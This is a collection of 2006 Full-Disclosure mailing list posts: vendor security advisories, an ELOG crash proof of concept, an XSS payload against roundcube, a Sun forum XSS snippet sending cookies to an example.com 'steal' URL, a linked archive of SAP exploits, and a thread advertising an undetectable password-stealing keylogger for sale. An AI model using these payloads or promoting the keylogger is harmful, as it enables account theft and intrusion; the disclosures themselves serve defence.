[Full-disclosure] [FLSA-2006:211760] Updated gzip package fixes security issues
- Fedora Legacy Update Advisory Synopsis: Updated gzip package fixes security issues Advisory ID: FLSA:211760 Issue date:2006-11-13 Product: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2006-4334, CVE-2006-4338, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337 - - 1. Topic: An updated gzip package is now available. The gzip package contains the GNU gzip data compression program. 2. Relevant releases/architectures: Fedora Core 3 - i386, x86_64 Fedora Core 4 - i386, x86_64 3. Problem description: Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash. (CVE-2006-4334, CVE-2006-4338) Tavis Ormandy of the Google Security Team discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code. (CVE-2006-4335, CVE-2006-4336, CVE-2006-4337) Users of gzip should upgrade to this updated package, which contain a backported patch and is not vulnerable to these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=211760 6. RPMs required: Fedora Core 3: SRPM: http://download.fedoralegacy.org/fedora/3/updates/SRPMS/gzip-1.3.3-16.1.fc3.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/3/updates/i386/gzip-1.3.3-16.1.fc3.legacy.i386.rpm x86_64: http://download.fedoralegacy.org/fedora/3/updates/x86_64/gzip-1.3.3-16.1.fc3.legacy.x86_64.rpm Fedora Core 4: SRPM: http://download.fedoralegacy.org/fedora/4/updates/SRPMS/gzip-1.3.5-6.1.0.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/4/updates/i386/gzip-1.3.5-6.1.0.legacy.i386.rpm x86_64: http://download.fedoralegacy.org/fedora/4/updates/x86_64/gzip-1.3.5-6.1.0.legacy.x86_64.rpm 7. Verification: SHA1 sum Package Name - fc3: 803cef0b8d4e06f79ae9ce64aee63cdd761e87b6 fedora/3/updates/i386/gzip-1.3.3-16.1.fc3.legacy.i386.rpm 602ad6828a3388063db0c45f13c256d92b12cc51 fedora/3/updates/x86_64/gzip-1.3.3-16.1.fc3.legacy.x86_64.rpm 7f4737f9e627480ee211022b9dffc1da5696adda fedora/3/updates/SRPMS/gzip-1.3.3-16.1.fc3.legacy.src.rpm fc4: 1cf4530543c8f7da0d331f11388bb7517fa013e4 fedora/4/updates/i386/gzip-1.3.5-6.1.0.legacy.i386.rpm 17fb012aacf13fcf623c5f6447d4ba127ed4a780 fedora/4/updates/x86_64/gzip-1.3.5-6.1.0.legacy.x86_64.rpm b49360a81b5d4df62dbbb3b2b094515678f41a35 fedora/4/updates/SRPMS/gzip-1.3.5-6.1.0.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v If you only wish to verify that each package has not been corrupted or tampered with, examine only the sha1sum with the following command: sha1sum 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4335 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4337 9. Contact: The Fedora Legacy security contact is <[EMAIL PROTECTED]>. More project details at http://www.fedoralegacy.org - signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believ
[Full-disclosure] ELOG Web Logbook Remote Denial of Service Vulnerability
Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.
(http://midas.psi.ch/elog/index.html)
Attached is the advisory which details the vulnerability.
Thanks,
OS2A
ELOG Web Logbook Remote Denial of Service Vulnerability
OS2A ID: OS2A_1008 Status:
10/31/2006 Issue Discovered
11/08/2006 Reported to the Vendor
11/08/2006 Fixed by Vendor
11/10/2006 Advisory Released
Class: Denial of ServiceSeverity: Medium
Overview:
-
The Electronic Logbook (ELOG) is part of a family of applications known as
weblogs. ELOG is a remarkable implementation of a weblog in its simplicity of
use and versatility.
http://midas.psi.ch/elog/index.html
Description:
Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.
The [global] section in configuration file elogd.cfg is used for settings
common to all logbooks. The vulnerability is due to improper handling of an
HTTP GET request if logbook name 'global' (or any logbook name prefixed
with global) is used in the request. When such a request is received,
a NULL pointer dereference occurs, leading to a crash of the service.
Only authenticated users can exploit this vulnerability if the application
is configured with password.
Impact:
---
Successful exploitation allows a remote attacker to crash the elogd server.
Affected Software(s):
-
ELOG 2.6.2 (SVN revision 1748) and prior.
Debian package elog 2.6.2+r1719-1 and prior are also vulnerable.
Proof of Concept:
-
The HTTP GET request given below is sufficient to crash affected server:
http://www.example.com/global/
or
Create a logbook [global_xxx] or [global xxx] in elogd.cfg
and try to access it using a browser.
http://www.example.com/global_xxx/
http://www.example.com/global%20xxx/
Analysis:
---
#gdb ./elogd
...
...
(gdb) break show_elog_list
Breakpoint 2 at 0x809d6e0
(gdb) c
Continuing.
(no debugging symbols found)
elogd 2.6.2 built Nov 8 2006, 01:25:48 revision 1699
Falling back to default group "elog"
Falling back to default user "elog"
Indexing logbooks ... done
Server listening on port 8080 ...
Breakpoint 2, 0x0809d6e0 in show_elog_list ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0809eb7a in show_elog_list ()
(gdb) bt
#0 0x0809eb7a in show_elog_list ()
#1 0x in ?? ()
(gdb) i r
eax0x0 0
ecx0x9d43d88164904328
edx0x0 0
ebx0x0 0
esp0xbfa8aca0 0xbfa8aca0
ebp0x80df40c0x80df40c
esi0xbfb27050 -1078824880
edi0x0 0
eip0x809eb7a0x809eb7a
eflags 0x200246 2097734
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/i $eip
0x809eb7a :mov(%eax),%eax
The vulnerable code is at Line:16774 of elogd.c,
n_msg = *lbs->n_el_index;
where the pointer lbs is dereferenced before being null checked.
--- elogd.c, show_elog_list() -
} else {
n_logbook = 1;
n_msg = *lbs->n_el_index;
}
msg_list = xmalloc(sizeof(MSG_LIST) * n_msg);
---elogd.c, show_elog_list() -
CVSS Score Report:
-
ACCESS_VECTOR = REMOTE
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT= COMPLETE
IMPACT_BIAS= AVAILABILITY
EXPLOITABILITY = FUNCTIONAL
REMEDIATION_LEVEL = OFFICIAL_FIX
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score= 5.0 (AV:R/AC:L/Au:NR/C:N/I:N/A:C/B:A)
CVSS Temporal Score= 4.1
Risk factor= Medium
Vendor Response:
---
Vendor has acknowledged the vulnerability and released a fixed version,
ELOG version 2.6.2-7 (SVN revision 1749).
http://savannah.psi.ch/websvn/log.php?repname=elog&path=%2Ftrunk%2F&rev=0&sc=0&isdir=1
(Revisions 1746-1749)
Debian has fixed this issue in elog_2.6.2+r1754-1,
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875
Solution:
-
Install the fixed version,
ELOG version 2.6.2-7 (SVN revision 1749) or later.
http://midas.psi.ch/elog/download.html
For debian, update to elog_2.6.2+r1754-1 or later.
Credits:
---
Jayesh KS and Arun Kethipelly of OS2A have been credited with the discovery and
analysis of this vulnerability.
___
Full-Disclosure - W
Re: [Full-disclosure] retiring from public security stuff
On 11/12/06, Georgi Guninski <[EMAIL PROTECTED]> wrote: > fyi: > > retiring from public security stuff. public flaming is not clear atm. > obviously this may change without notice. > this does not mean selling out. No worries mate, you deserve a break. Thanks for your contributions to the infosec community and helping to keep the Internet useful for something other than phishing sites and spam. Asta La Pasta Georgi, you will be missed! -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Keylogger
I wonder how many suckers will send this guy some money. It is not hard to write something to hook the keyboard driver that is not detected by AV. It is not hard to write something that logs and then sends emails either. The hard part is getting it on the system and having it stay undetected. So I am proud to announce that for the small, one time only price of three equal payments of $99.95 I can offer remote exploits that can allow you to install this keylogger on systems without being detected. Act now and I will throw in for free source code valued at $29.95. Only the first 5 customers qualify for this incredible never seen before offer. See you, NT Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Keylogger
This seems like a rip-off. How is it making itself startup? Most of the usual means are tracked by various programs (such as Spybot S&D). Since it uses ordinary email, the recipient's ISP or company could easily notice (especially with the convenient hourly pattern). Also, why would you display error messages? This only attracts the user's attention to the computer, and makes it likely that they'll call in tech support. Matthew Flaschen 0 0 wrote: > Yesterday I finished programming a keylogger, and have decided to sell it > online for a small price. I have posted here because I believe people > would > be interested in a hacking tool such as this - keyloggers are the easiest > and quickest way to obtain an email password. Here are its features: > > -> Undetectable by ALL antivirus products in use today. > -> Remains on victim's computer permanently (adds to startup). > -> Bypasses Windows Firewall. > -> Sends logs via email to your chosen email account. > -> Logs include computer information, current window name, and of course > logged keystrokes. > -> Logs are sent hourly. > -> Displays fake error message to user. > > My pricing plans are: > > -> $11 = Keylogger. > -> $16 = Keylogger + Source code. > -> +$5 to either for access to all future updates. > > I only accept paypal/credit card. > > Buying this product is simple - simply fill in the template below and email > it to me at the below address (replace [at] with @): > > richard.williams140 [at] googlemail.com > > = > > To: (me) > Subject: Keylogger Purchase > > My chosen purchase: (enter what you wish to buy here) > Send logs to: (your chosen email here) > > (enter any notes on the purchase here) > > = > > After receiving your email, I will enter your details into the keylogger > and > compile it new for you. Upon finishing this, I will email you back and let > you know where you need to send the paypal money to (or pay via credit > card). After receiving your money, I will send the keylogger and > instructions to you by email. > > After receiving the program, it really is as simple as sending it to > someone, telling them to run it, and watching the logs appear in your email > account! > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] retiring from public security stuff
*yawn* http://michaeldaw.org/news/news-121106-0/ even bigger *YAWN* Nobel Prize? A nobel prize should go to someone who actually does some good and improves the state of security. Good riddance. See you, NT. Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Keylogger
i think i order 10 pieces, what next to do ? 0 0 schrieb: Yesterday I finished programming a keylogger, and have decided to sell it online for a small price. I have posted here because I believe people would be interested in a hacking tool such as this - keyloggers are the easiest and quickest way to obtain an email password. Here are its features: -> Undetectable by ALL antivirus products in use today. -> Remains on victim's computer permanently (adds to startup). -> Bypasses Windows Firewall. -> Sends logs via email to your chosen email account. -> Logs include computer information, current window name, and of course logged keystrokes. -> Logs are sent hourly. -> Displays fake error message to user. My pricing plans are: -> $11 = Keylogger. -> $16 = Keylogger + Source code. -> +$5 to either for access to all future updates. I only accept paypal/credit card. Buying this product is simple - simply fill in the template below and email it to me at the below address (replace [at] with @): richard.williams140 [at] googlemail.com = To: (me) Subject: Keylogger Purchase My chosen purchase: (enter what you wish to buy here) Send logs to: (your chosen email here) (enter any notes on the purchase here) = After receiving your email, I will enter your details into the keylogger and compile it new for you. Upon finishing this, I will email you back and let you know where you need to send the paypal money to (or pay via credit card). After receiving your money, I will send the keylogger and instructions to you by email. After receiving the program, it really is as simple as sending it to someone, telling them to run it, and watching the logs appear in your email account! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Keylogger
Yesterday I finished programming a keylogger, and have decided to sell it online for a small price. I have posted here because I believe people would be interested in a hacking tool such as this - keyloggers are the easiest and quickest way to obtain an email password. Here are its features: -> Undetectable by ALL antivirus products in use today.-> Remains on victim's computer permanently (adds to startup).-> Bypasses Windows Firewall.-> Sends logs via email to your chosen email account. -> Logs include computer information, current window name, and of course logged keystrokes.-> Logs are sent hourly.-> Displays fake error message to user.My pricing plans are:-> $11 = Keylogger. -> $16 = Keylogger + Source code.-> +$5 to either for access to all future updates.I only accept paypal/credit card.Buying this product is simple - simply fill in the template below and email it to me at the below address (replace [at] with @): richard.williams140 [at] googlemail.com=To: (me)Subject: Keylogger PurchaseMy chosen purchase: (enter what you wish to buy here) Send logs to: (your chosen email here)(enter any notes on the purchase here)=After receiving your email, I will enter your details into the keylogger and compile it new for you. Upon finishing this, I will email you back and let you know where you need to send the paypal money to (or pay via credit card). After receiving your money, I will send the keylogger and instructions to you by email. After receiving the program, it really is as simple as sending it to someone, telling them to run it, and watching the logs appear in your email account! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1209-1] New trac packages fix cross-site request forgery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1209-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 12th, 2006 http://www.debian.org/security/faq - -- Package: trac Vulnerability : cross-site request forgery Problem-Type : remote Debian-specific: no It was discovered that Trac, a wiki and issue tracking system for software development projects, performs insufficient validation against cross-site request forgery, which might lead to an attacker being able to perform manipulation of a Trac site with the privileges of the attacked Trac user. For the stable distribution (sarge) this problem has been fixed in version 0.8.1-3sarge6. For the unstable distribution (sid) this problem has been fixed in version 0.10.1-1. We recommend that you upgrade your trac package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1-3sarge6.dsc Size/MD5 checksum: 656 9aee65c62e905729214dc065e0dd85a5 http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1-3sarge6.diff.gz Size/MD5 checksum:14618 7de0360d7a6cd04c7cb535b69b6d296b http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1.orig.tar.gz Size/MD5 checksum: 236791 1b6c44fae90c760074762b73cdc88c8d Architecture independent components: http://security.debian.org/pool/updates/main/t/trac/trac_0.8.1-3sarge6_all.deb Size/MD5 checksum: 199920 dd5e78a6212c457d72729a17e5810b25 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFV2g3Xm3vHE4uyloRApLXAKClEEBSL8J3ULEp/j+13YTehKowKACdGh+5 5z/OZNjZ8RzIjhN1GgS9+RQ= =DEKh -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 18th anniversary of Internet worma.k.a. Morris worm
On Sun, 12 Nov 2006 18:21:16 GMT, "Dave \"No, not that one\" Korn" said: > Georgi Guninski wrote: > > my question was: > > > > when was the first provable *public* (as in common sense) > > announcement of the exploitability of buffer overflows. > > The use of smashing the stack to seize control of the program flow was in > everyday usage on the Commodore PET from around 1979-1980ish. It was our > standard technique for making programs autorun after loading! Was that a "classic" smash-the-stack, where an overly long paramater is used to over-write the return pointer, or were you guys just intercepting the return pointer directly? If the latter, I'm pretty sure there was software that would overlay return pointers in order to redirect program flow as far back as IBM's OS/360 in the 1967-75 timeframe. pgpGYl0f0tESI.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] retiring from public security stuff
http://michaeldaw.org/news/news-121106-0/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Old SAP exploits
For historical purposes only (everything should compile/run fine). An TGZ archive is attached to this email, and a mirror is available on my website : http://nicob.net/mirrors/sap_sploits.tgz o testing users and passwords with RfcOpenEx (account locking bypass) : - allow networked attack on SAP passwords - now deprecated in favor of THC Hydra - need the RFC SDK to compile - port : TCP/3300+SYSNR - exploit : sapchk.c o customized RFC_SYSTEM_INFO (information disclosure) : - will leak OS type, SAP version, real IP address, ... - need the RFC SDK to compile - port : TCP/3300+SYSNR - exploit : sap-banner.c o original Win32 gwrd bug by FX (remote command execution) : - patched in 4.6D patch 1767 and 6.40 patch 4 - partial control on a CreateProcess() call - can be used for "cmd /c ..." evil - port : UDP/3300+SYSNR - exploit : r3mote_win_UDPexec.pl o linux port of the gwrd bug (remote command execution) : - patched in 4.6D patch 1767 and 6.40 patch 4 - partial control on a execve() call - each argument but the first must be max 8 characters long - exploitable remotely under some conditions - port : UDP/3300+SYSNR - exploit : r3mote_unix_UDPexec.pl and r3mote_unix_wrapper.sh o two bytes UDP crash in enserver.exe (remote DoS) : - patched in 6.40 patch 6 - port : UDP/64999 - exploit : SAP_WebAS_UDP_DoS.c - no, that's not related to the DoS published earlier this month With many thanks to [EMAIL PROTECTED], the OaiTeam, FX from Phenoelit and all the valuable Darklab members. Nicob sap_sploits.tgz Description: application/compressed-tar signature.asc Description: Ceci est une partie de message numériquement signée ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS in roundcube.com and users of it
There is an XSS vulnerability in roundcube webmail: http://demo.roundcube.net/?_task=');alert(%22XSS%22)// Btw, we've been posting 0-day XSS vulnerabilities at http://sla.ckers.org/forum/list.php?3 to take it out of the full disclosure list since lots of people don't want to see the sheer volume of reports. We've got close to a thousand companies and counting. We're just trying to cut down on the noise to people's inboxes. That is all. -RSnake http://ha.ckers.org http://sla.ckers.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] sun and their pathetic forum management (xss, etc)
Sun, in their amazing patheticness, have again allowed direct HTML
to be written into their forum system.
URL: http://forum.java.sun.com/forum.jspa?forumID=553
It works on only select forums, but due to severe incompetence from
the administrators of the site, this issue will occur quit often.
It is worth your while to test out any forum you like, you may just
see it working.
EXPLOIT (hah):
==
start a new thread or post a reply and include any HTML you like,
preferrably to steal a cookie or trick users into logging in again
but submit to your server; your imagination is the only restriction.
EXAMPLE:
==
Message:
Hello.
window.attachEvent("onload", foo);
function foo() {
xxa.src = "http://www.example.com/steal/?"; + document.cookie;
}
FIX:
==
Sun needs to accept that their administration of the site is
absolutely terrible and do something about it. The Jive software
that runs the forum is completely fine, it is suns mismanagement
that causes these issues. Jive should not be subject to the very
bad image the forum software gets from it's use on Sun's site.
Thanks.
Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 18th anniversary of Internet worma.k.a. Morris worm
Georgi Guninski wrote: > my question was: > > when was the first provable *public* (as in common sense) > announcement of the exploitability of buffer overflows. The use of smashing the stack to seize control of the program flow was in everyday usage on the Commodore PET from around 1979-1980ish. It was our standard technique for making programs autorun after loading! cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] retiring from public security stuff
fyi: retiring from public security stuff. public flaming is not clear atm. obviously this may change without notice. this does not mean selling out. if one needs to ask for a reason: got old, got somewhat tired. since kids often ask `how to hack', here is some unsupported advice without warranty of any kind: *) there is no magic wand solution *) be carefull, anonymous and paranoid *) patience greatly helps *) in a lot of cases people don't succed just because they don't try - as in this quote "It is well known that a vital ingredient of success is not knowing that what you're attempting can't be done." -- Terry Pratchett *) fame is worthless bye bye and all the best :) -- georgi EOM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
